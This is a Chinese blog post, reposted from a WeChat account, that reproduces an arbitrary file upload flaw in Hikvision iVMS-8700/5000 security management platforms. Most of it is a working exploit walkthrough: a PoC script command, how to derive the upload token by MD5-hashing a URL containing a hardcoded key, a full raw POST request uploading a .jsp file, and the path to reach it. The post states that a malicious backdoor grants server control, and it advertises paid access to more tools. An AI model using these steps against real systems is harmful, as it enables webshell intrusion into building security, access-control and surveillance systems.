海康威视综合安防管理平台是一套“集成化”、“数字化”、“智能化”的平台,包含视频、报警、门禁、访客、梯控、巡查、考勤、消费、停车场、可视对讲等多个子系统。
近期该系统爆出存在任意文件上传在野0day漏洞 ,攻击者可通过获取密钥任意构造token,请求接口任意上传文件,导致获取服务器WebShell权限,同时可远程进行恶意代码执行。影响版本iVMS-8700/5000。
检测脚本:
python3 ivms-poc.py -f url.txt
下载地址:公众号回复hikvision-poc-main.zip下载
验证漏洞存在后,下一步就是上传了。
首先获取token值,使用md5加密该链接,取得32位大写字符即为token值。
https://xx.xx.xx.xx/eps/api/resourceOperations/uploadsecretKeyIbuilding
取得token后,提交post包,显示invalid成功,显示empty即为失败。
POST /eps/api/resourceOperations/upload?token=************************* HTTP/1.1
下一步,上传webshell文件,先上传一个测试文件。
POST /eps/api/resourceOperations/upload?token=6B2D076D11FEF120FB81AA377510DC51 HTTP/1.1Host: xx.xx.xx.xxCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ak;q=0.8Cookie: ISMS_8700_Sessionname=1ED2B975E9CB9B73D71CD033B92F5AB5Connection: closeContent-Type: multipart/form-data;boundary=f7d1250b2d43db9324c19e1073573ce6Content-Length: 179--f7d1250b2d43db9324c19e1073573ce6Content-Disposition: form-data; name="fileUploader"; filename="3.jsp"Content-Type: image/jpegyongbo--f7d1250b2d43db9324c19e1073573ce6
成功上传,使用Web访问:
http://X.X.X.X/eps/upload/resourceUuid值.jsp
如果上传的是恶意后门,就可以拿到服务器权限。
公众号中提及的所有工具,均放在APP“知识星球”,星球会员100元加入,内含大量工具,包含公众号之前发过的工具,均可免费下载。另可享受本人在线教学福利。
小知识
声明
好文推荐
原文始发于微信公众号(丁永博的成长日记):海康威视iVMS综合安防系统任意文件上传漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论